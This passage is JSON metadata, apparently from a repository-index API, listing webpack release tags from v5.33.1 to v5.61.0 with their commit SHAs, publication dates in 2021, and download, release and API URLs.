ack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/t